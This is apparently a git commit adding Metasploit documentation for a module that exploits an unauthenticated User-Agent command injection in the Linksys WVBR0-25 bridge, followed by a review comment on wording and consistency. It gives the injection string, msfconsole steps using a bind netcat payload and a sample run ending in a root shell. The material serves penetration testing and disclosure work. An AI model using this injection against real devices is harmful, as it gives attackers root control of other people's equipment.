Adding doc file for module linksys_wvbr0_user_agent_exec_noauth

MS-2855/keylogger-mettle-extension
headlesszeke 2018-01-02 14:54:18 -06:00
parent 3dfb836768
commit 3b0f0aa358
1 changed files with 49 additions and 0 deletions


@ -0,0 +1,49 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.
Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`.
Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.
## Verification Steps
1. Make sure the device is running.
2. Start msfconsole.
3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
4. Do: ```set payload cmd/unix/bind_netcat```
5. Do: ```set RHOST <ip>```
6. Do: ```exploit```
7. You should get a shell.
## Options
**PAYLOAD**
The `generic` and `netcat` payload types are valid.
## Scenarios
### Firmware 1.0.39
The following is an example run getting a shell:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
```
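Review bot: the description of the check method in the "Vulnerable Application" section is internally inconsistent: a User-Agent of `"; printf "[random string]` makes the device echo the random string itself, yet the next sentence says the check looks for "an md5 hash of the random string" in the response. Either the check actually pipes the output through a hashing command (in which case document the real injected string so readers can reproduce the check by hand, e.g. `"; printf "[random string]" | md5sum`), or the response is matched against the plain string and the md5 wording should go. In the same section, "The latest confirmed vulnerable firmware version is 1.0.39" and the later line "Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit" repeat each other and should be merged into one statement; "fix the exploit" should read "fix the vulnerability", and the note about downgrading newer versions sits oddly next to the 1.0.41 fix claim without saying whether 1.0.41 was tested. The Verification Steps never run `check` even though the text says the check method is reliable, so add a `check` step before `exploit`. Finally, under "Options", "The `generic` and `netcat` payload types are valid" is too vague to act on; list the exact payload names that were tested (the scenario only shows `cmd/unix/bind_netcat`).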